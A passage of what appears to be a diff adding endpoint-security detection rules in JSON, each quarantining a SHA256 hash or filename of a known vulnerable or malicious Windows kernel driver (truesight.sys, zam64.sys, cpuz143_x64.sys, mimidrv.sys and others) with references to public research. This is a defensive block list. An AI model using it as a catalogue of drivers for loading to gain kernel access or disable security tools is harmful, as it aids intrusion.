"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.144055Z", + "creation_date": "2026-03-23T11:45:31.144057Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.144063Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7555c82a5e6dd86cf4ba7bf3745700da025af20fee489864c76a98ae0792908f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "509a1e1d-2356-53af-a5ab-1c38a1ddff63", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.492232Z", + "creation_date": "2026-03-23T11:45:31.492234Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:31.492240Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "084f82fde42e6388de4ba807360d989deaf1777d89a87d1cb552ced6467b4287", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "509b5701-3fd2-53ca-b7df-85d01a5f7051", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.827932Z", + "creation_date": "2026-03-23T11:45:31.827935Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.827944Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "addf4de4bd00a4d1a928a3dc80cc508b4cac3c263567d4d1a336ce64c6c225dc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "509be2a1-0370-53e0-bea6-558647ac3a48", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.819377Z", + "creation_date": "2026-03-23T11:45:30.819379Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.819384Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "91afa3de4b70ee26a4be68587d58b154c7b32b50b504ff0dc0babc4eb56578f4", + "comment": "Vulnerable Kernel Driver (aka VdBSv64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "50a57743-81e7-5b86-8fa8-5915cc29a6ff", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.143456Z", + "creation_date": "2026-03-23T11:45:31.143459Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.143464Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"37a68e0746a1fad05fdcaf42051f42c1cb06d0b71fa91ffc6bf633cb84128f02", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "50a68351-931b-5f92-9e58-79c0ac11a0e8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.615589Z", + "creation_date": "2026-03-23T11:45:29.615591Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.615596Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bb4e3aa888a779238b210d6406aa480f01d27ea28d20699b1ec29a59dae19913", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "50a86e60-ac98-59df-9f41-b3fe65cbf697", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + 
"id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.830350Z", + "creation_date": "2026-03-23T11:45:30.830352Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.830357Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e7c3bbb2810bb71e48c92223e48ba9a7180d31ca81b3a848f0414ae3e8eb2d36", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "50b22166-a1f3-5675-9f2e-01a8e92b4f32", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.159421Z", + "creation_date": "2026-03-23T11:45:31.159423Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.159429Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bd16a8d8c15c3b5fc059c43b4cd46529a7f1803772f909794b4f4a1a0847f607", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "50b6d9dd-cabf-5675-925e-ebfd464bf9ba", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.457129Z", + "creation_date": "2026-03-23T11:45:30.457133Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.457141Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5f4b06327ffbec2a59725a57c357daf54ea2f58aef5dc7ff3f5370168af09fb0", + "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "50b93558-3405-564e-aef1-4fcd42e868d0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.458429Z", + "creation_date": "2026-03-23T11:45:30.458433Z", + "enabled": true, + 
"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.458449Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "748b6350472e21bab16497e4296794619dede7fcdb188fea1574f89498a2ff54", + "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "50c049b8-1674-5649-8e59-c9587aca0ff7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.822708Z", + "creation_date": "2026-03-23T11:45:30.822711Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.822717Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6b2f669c6fb1e839ba146b416021ddfb7bf4785558113e11ac2c8a0e3399f338", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "50c3b7ca-1615-5742-956b-298405b29fb2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + 
"global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.487052Z", + "creation_date": "2026-03-23T11:45:31.487055Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.487064Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7cac5ec96dfcddba9045d401c22cf18f4c3bfda60ae5183b183b3621bdcda778", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "50c9b1f7-a48d-5313-8d87-542715d6f45d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.479301Z", + "creation_date": "2026-03-23T11:45:31.479305Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.479315Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2acf75a9b834ff3999c218e5a803876e181e9e0ed6d77174ef9a9e889d82bb03", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "50c9b6fb-64ff-5927-bf8f-6a6995dcc3d1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.971449Z", + "creation_date": "2026-03-23T11:45:29.971452Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.971459Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "de8f8006d8ee429b5f333503defa54b25447f4ed6aeade5e4219e23f3473ef1c", + "comment": "MalwareFox AntiMalware Vulnerable Driver (aka zam64.sys and zam32.sys) [CVE-2021-31727, CVE-2021-31728] [https://www.loldrivers.io/drivers/e5f12b82-8d07-474e-9587-8c7b3714d60c/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "50d4ce18-40d0-52c2-b056-967b7612a942", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + 
"source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.616761Z", + "creation_date": "2026-03-23T11:45:29.616765Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.616773Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bee62b69023212a5a964d323f60e5858d7cbd767a39f3d5ef87cacb080b1dbf2", + "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "50d61605-fffa-5ceb-9cda-dc176d79320b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.984321Z", + "creation_date": "2026-03-23T11:45:29.984323Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.984328Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2d83ccb1ad9839c9f5b3f10b1f856177df1594c66cbbc7661677d4b462ebf44d", + "comment": 
"Vulnerable Kernel Driver (aka inpoutx64.sys) [https://www.loldrivers.io/drivers/91ff1575-9ff2-46fd-8bfe-0bb3e3457b7f/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "50e07033-dc05-55b0-bfee-cf675b326890", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.479923Z", + "creation_date": "2026-03-23T11:45:30.479927Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.479933Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ae9b7b6d688de9b7b5be8b4b4d61207b23a143818d4609426f0d53b6f09be9a2", + "comment": "Vulnerable AMD uProf Kernel Driver (aka AMDCpuProfiler.sys) [CVE-2023-20562] [https://github.com/zeze-zeze/HITCON-2023-Demo-CVE-2023-20562] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "50ebee9a-879b-5d19-b71a-b523edbcf350", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.610689Z", + "creation_date": 
"2026-03-23T11:45:29.610691Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.610697Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9a523854fe84f15efc1635d7f5d3e71812c45d6a4d2c99c29fdc4b4d9c84954c", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "50ef8b09-3be3-52d3-9a51-569670b1470c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.464312Z", + "creation_date": "2026-03-23T11:45:30.464316Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.464325Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e8ec06b1fa780f577ff0e8c713e0fd9688a48e0329c8188320f9eb62dfc0667f", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "50f54ee8-6b3b-5e7e-aab4-e8e4cee35d92", + "test_maturity_current_count": 0, + 
"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.607091Z", + "creation_date": "2026-03-23T11:45:29.607093Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.607099Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "filename", + "value": "PROCEXP.SYS", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "51007e20-bf30-596c-a5c6-6ac742352c26", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.493034Z", + "creation_date": "2026-03-23T11:45:31.493037Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.493046Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, 
+ "references": [], + "type": "hash", + "value": "32030e49c352a25e3d373617dc58a267cb068e93196001340cb61d6537d9b7a3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "51079775-6177-595d-be5c-3974fa6bc666", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.147983Z", + "creation_date": "2026-03-23T11:45:31.147985Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.147991Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1682b9bccf2ec3d397dc439a5bb6d986cd938bd63e8c9b7ed4c0512a7d71a6d9", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5108c865-7cff-5506-ba82-809ac78a6eb6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.808266Z", + "creation_date": "2026-03-23T11:45:31.808269Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.808278Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "253f80e82f61e3dcf07f1a9fa55ac826323648c169f1df21e3e0e6335b13178c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "511220d1-c511-5b77-800b-b240c13d5533", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.452372Z", + "creation_date": "2026-03-23T11:45:30.452375Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.452385Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0ae8d1dd56a8a000ced74a627052933d2e9bff31d251de185b3c0c5fc94a44db", + "comment": 
"Vulnerable Kernel Driver (aka Chaos-Rootkit.sys) [https://www.loldrivers.io/drivers/abcd2c10-1078-4cf9-b320-04ca38d22f98/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5118abca-b500-5eb4-b19b-ca1c98599ba7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.481326Z", + "creation_date": "2026-03-23T11:45:30.481328Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.481334Z", + "rule_level": null, + "rule_level_override": null, + 